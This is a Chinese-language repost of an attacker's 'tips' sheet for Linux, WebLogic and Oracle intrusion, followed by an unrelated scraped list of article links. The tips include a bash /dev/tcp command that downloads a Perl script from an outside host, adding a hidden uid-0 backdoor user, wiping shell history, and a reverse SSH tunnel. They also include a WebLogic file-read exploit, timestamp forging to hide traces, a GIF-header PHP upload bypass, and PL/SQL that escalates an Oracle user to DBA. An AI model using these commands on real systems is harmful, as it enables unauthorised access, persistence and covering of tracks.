1.无wget nc等下载工具时下载文件
exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat<&5 > c.pl

2.Linux添加uid为0的用户
useradd -o -u 0 cnbird

3.bash去掉history记录
export HISTSIZE=0
export HISTFILE=/dev/null

4.SSH反向链接
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指定远端服务器SSH端口
然后服务器上执行ssh localhost  -p 44即可

5.weblogic本地读取文件漏洞
curl -H "wl_request_type: wl_xml_entity_request" -H "xml-registryname: ../../" -H "xml-entity-path: config.xml" http://server/wl_management_internal2/wl_management

6.apache查看虚拟web目录
./httpd -t -D DUMP_VHOSTS

7.cvs***技巧
CVSROOT/passwd   UNIX SHA1的密码文件
CVSROOT/readers
CVSROOT/writers
CVS/Root  
CVS/Entries     更新的文件和目录内容
CVS/Repository

8.Cpanel路径泄露
/3rdparty/squirrelmail/functions/plugin.php

9.修改上传文件时间戳(掩盖***痕迹)
touch -r 老文件时间戳 新文件时间戳

10.利用baidu和google搜索目标主机webshell
intitle:PHPJackal 1t1t

11.包总补充
创建临时“隐藏”目录 mkdir /tmp/...
/tmp/...目录在管理员有宿醉的情况下是“隐藏”的,可以临时放点exp啥的

12.利用linux输出绕过gif限制的图片
printf "GIF89a\x01\x00\x01\x00<?php phpinfo();?>" > poc.php

13.读取环境变量对于查找信息非常有帮助
/proc/self/environ

14.最新的ORACLE 11提升用户权限(只要session权限)
DBMS_JVM_EXP_PERMS 中的IMPORT_JVM_PERMS

判断登陆权限
select * from session_privs;
Create SESSION

select * from session_roles;

select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY Where GRANTEE = 'GREMLIN(用户名)';

DESC JAVA$POLICY$

DECLARE
POL DBMS_JVM_EXP.TEMP_JAVA_POLICY;
CURSOR C1 IS Select 'GRANT' USER(), 'SYS', 'java.io.FilePermission', '<<ALL FILES>>', 'execute', 'ENABLE' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

connect / as sysdba
COL TYPE_NAME FOR A30;
COL NAME FOR A30;
COL_ACTION FOR A10;
Select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY Where GRANTEE = '用户';

connect 普通用户
set serveroutput on
exec dbms_java.set_output(10000);

Select DBMS_JAVA.SET_OUTPUT_TO_JAVA('ID', 'oracle/aurora/rdbms/DbmsJava', 'SYS', 'writeOutputToFile', 'TEXT', NULL, NULL, NULL, NULL,0,1,1,1,1,0, 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;'BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO 用户''; END;', 'BEGIN NULL; END;') FROM DUAL;

EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS('NO_SUCH_SUBSCRIPTION', SYSDATE());

set role dba;

select * from session_privs;

EXEC SYS.VULNPROC('FOO"||DBMS_JAVA.SET_OUTPUT_TO_SQL("ID","DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE""GRANT DBA TO PUBLIC"";DBMS_OUTPUT.PUT_LINE(:1);END;","TEXT")||"BAR');

Select DBMS_JAVA.RUNJAVA('oracle/aurora/util/Test') FROM DUAL;
SET ROLE DBA;

15. webLogic***技巧
四. Weblogin Script Tool(WLST)

写入到<Domain_home>\\config\\config.xml

1.进行修改:
<bea_home>\wlserver_10.0\server\bin\setWLSenv.sh
2.启动WLST
java weblogic.WLST

wls:/offline> connect('admin', 'admin', 't3://127.0.0.1:7001')
wls:/bbk/serverConfig> help()

wls:/bbk/serverConfig> edit()
wls:/bbk/serverConfig> cd('Servers')
wls:/bbk/serverConfig/Server-cnbird> cd('Log')
wls:/bbk/serverConfig/Server-cnbird/log> cd('Server-cnbird')
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird> startEdit()
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> set('FileCount', '4')
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> save()
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> activate() 提交对应Active Change
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> disconnect()
wls:/offline> exit()

3.批处理:
保存以上命令为cnbird.py
connect('admin', 'admin', 't3://127.0.0.1:7001')
cd('Servers')
cd('Log')
cd('Server-cnbird')
startEdit()
set('FileCount', '4')
save()
然后执行java weblogic.WLST cnbird.py

转载于:https://blog.51cto.com/obnus/428527

送给linux***爱好者的小技巧 分享相关推荐

  1. linux 终端 朗读,使Linux终端朗读文字的小技巧分享,linux终端

    使Linux终端朗读文字的小技巧分享,linux终端这篇文章主要介绍了使Linux终端朗读文字的小技巧分享,主要依赖espeak这个软件,需要的朋友可以参考下 对于那些不能文字朗读的设备,有个小工具可 ...

  2. 坚果云同步linux,#坚果云每日小技巧分享# 你们要的“选择性同步”越狱啦!

    原标题:#坚果云每日小技巧分享# 你们要的"选择性同步"越狱啦! 自从坚果云同步盘推出云桥模式之后,选择性同步被我们的产品经理关进了大牢,这让我们很多选择性同步的用户感到不适应,并 ...

  3. 坚果云 android 操作历史,#坚果云每日小技巧分享# 你也该学会使用文件历史版本了...

    原标题:#坚果云每日小技巧分享# 你也该学会使用文件历史版本了 文件历史版本是坚果云一直重点推荐的内容,很多人虽然没有使用过或者极少使用过,但是你一旦有了使用它的机会你就会发现文件历史版本功能可以帮助 ...

  4. python处理大量excel数据-使用python将大量数据导出到Excel中的小技巧分享

    (1) 问题描述:为了更好地展示数据,Excel格式的数据文件往往比文本文件更具有优势,但是具体到python中,该如何导出数据到Excel呢?如果碰到需要导出大量数据又该如何操作呢? 本文主要解决以 ...

  5. python输出数据到excel-使用python将大量数据导出到Excel中的小技巧分享

    (1) 问题描述:为了更好地展示数据,Excel格式的数据文件往往比文本文件更具有优势,但是具体到python中,该如何导出数据到Excel呢?如果碰到需要导出大量数据又该如何操作呢? 本文主要解决以 ...

  6. 数学建模论文写作小技巧分享

    学习网址 :哔哩哔哩网站[数学建模论文写作小技巧分享] 数学建模论文写作小技巧分享 数学建模-论文-各部分-写作-指导 数学建模[建模竞赛与论文写作] 目   录 P1 [必看]代码.论文查重问题怎么 ...

  7. python缺失值填充均值法_pandas 使用均值填充缺失值列的小技巧分享

    pd.DataFrame中通常含有许多特征,有时候需要对每个含有缺失值的列,都用均值进行填充,代码实现可以这样: for column in list(df.columns[df.isnull().s ...

  8. mysql insert 运算_MySql insert插入操作的3个小技巧分享

    1.插入的数据来源自其他表 表A有id, cola 字段 表B有id, cola, colb...等字段,其中id都为主键,cola为相同名字的列 现想将表B中colb>1000的记录都插入表A ...

  9. 传奇世界手游活人最多服务器,传奇世界手游那些不为人知小技巧分享

    传奇世界中有很多不为人知的小技巧,这些小技巧往往能带来大作用!那么今天将为大家带来哪些传世小技巧呢,下面就跟小编一起来看看吧! 一.猎杀精英怪,换线有惊喜! 很多玩家在成长的过程中,需要通过精英怪获得 ...

最新文章

  1. 注解RequestMapping中的URI路径最前面到底需不需要加斜线?
  2. java 获取活动窗口_用Java获取活动窗口信息
  3. Redis事务(transaction)
  4. Java中的JsonConfig详解
  5. 怎么选择跨境电商ERP系统?
  6. 机器 学习中的方差和偏差
  7. python程序字符串中字符排序_python字符串排序方法
  8. 实战手游新手流程:细节、反馈、体验
  9. 基于学习的方法决定在哪些分支节点上运行heuristic算法
  10. 心跳包(HeartBeat)
  11. 平板手写笔有必要买吗?开学季便宜又好用电容笔推荐
  12. 易语言多线程崩溃解决的原因
  13. 我的工训:加强沟通、加深理解、扩大分享!
  14. Android之主题皮肤实现
  15. Learning with Noisy Correspondencefor Cross-modal Matching(NCR)--文献翻译
  16. 汇编语言中b和bl关键字的区别
  17. oss pdf浏览器直接下载_阿里云oss直接下载的小技巧
  18. 帮铁粉脱单|【深圳女】No.14|93年,英语老师,本科157,喜欢健身,活泼开朗
  19. 机器学习之matlab算法SVM用150天数据预测上证指数的涨跌
  20. HTML5,input新增的属性

热门文章

  1. python :SyntaxError: Non-ASCII character '\xe5' in file 错误
  2. 微信小程序 扫码 加载图片
  3. c# datatable数据合并方法
  4. pythoniter 2_python [iter(list)] * 2是什么意思?
  5. 全栈Python自动化测试学习资料【付费资源、看到即赚到,】
  6. mysql 排序序列_Mysql序列(八)—— group by排序问题 怀瑾握瑜XI
  7. SOPC技术习题及答案
  8. 2022-2028全球2-氨基-4-乙基吡啶行业调研及趋势分析报告
  9. Idel中maven全局配置
  10. 初等三四阶行列式计算器